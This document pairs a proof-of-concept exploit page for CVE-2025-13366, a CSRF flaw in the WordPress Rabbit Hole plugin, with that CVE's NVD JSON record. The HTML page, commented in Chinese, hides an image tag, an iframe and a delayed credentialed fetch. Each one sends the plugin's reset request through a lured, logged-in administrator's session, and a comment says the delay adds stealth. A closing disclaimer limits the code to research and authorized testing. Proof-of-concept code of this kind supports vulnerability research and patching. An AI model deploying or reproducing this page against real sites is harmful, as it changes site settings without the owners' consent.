CVE-2025-13366

<!-- CVE-2025-13366 CSRF PoC for WordPress Rabbit Hole Plugin --> <!--诱骗已登录的管理员访问此页面即可触发漏洞--> <html> <body> <h1>Rabbit Hole Plugin CSRF Exploit</h1> <p>点击下方链接或等待自动触发（部分浏览器会自动加载图片）</p> <!-- 方法1: 使用img标签自动触发GET请求 --> <img src="http://target-wordpress-site.com/wp-admin/admin.php?page=rabbit-hole&action=reset" width="0" height="0" style="display:none;" /> <!-- 方法2: 使用隐藏的iframe --> <iframe src="http://target-wordpress-site.com/wp-admin/admin.php?page=rabbit-hole&action=reset" style="display:none;"></iframe> <!-- 方法3: 使用JavaScript自动跳转 --> <script> // 延迟执行以增加隐蔽性 setTimeout(function() { // 构造重置请求URL var targetUrl = 'http://target-wordpress-site.com/wp-admin/admin.php?page=rabbit-hole&action=reset'; // 使用fetch发送请求（需要管理员已登录且会话有效） fetch(targetUrl, { method: 'GET', credentials: 'include' }).then(function(response) { console.log('Reset request sent'); }).catch(function(error) { console.log('Request failed:', error); }); }, 2000); // 2秒后自动执行 </script> <p><strong>注意：</strong>此PoC仅用于安全研究和授权测试，未经许可使用此代码进行攻击属于违法行为。</p> </body> </html>

{"cve": {"id": "CVE-2025-13366", "sourceIdentifier": "[email protected]", "published": "2025-12-12T04:15:41.663", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Rabbit Hole plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing or incorrect nonce validation on the plugin's reset functionality. This makes it possible for unauthenticated attackers to reset the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. The vulnerability is exacerbated by the fact that the reset operation is performed via a GET request, making exploitation trivial via image tags or hyperlinks."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/rabbit-hole/tags/1.1/functions/admin.php#L7", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/rabbit-hole/trunk/functions/admin.php#L7", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/eab5de7e-ddab-4c6f-af87-acce7b5ff15b?source=cve", "source": "[email protected]"}]}}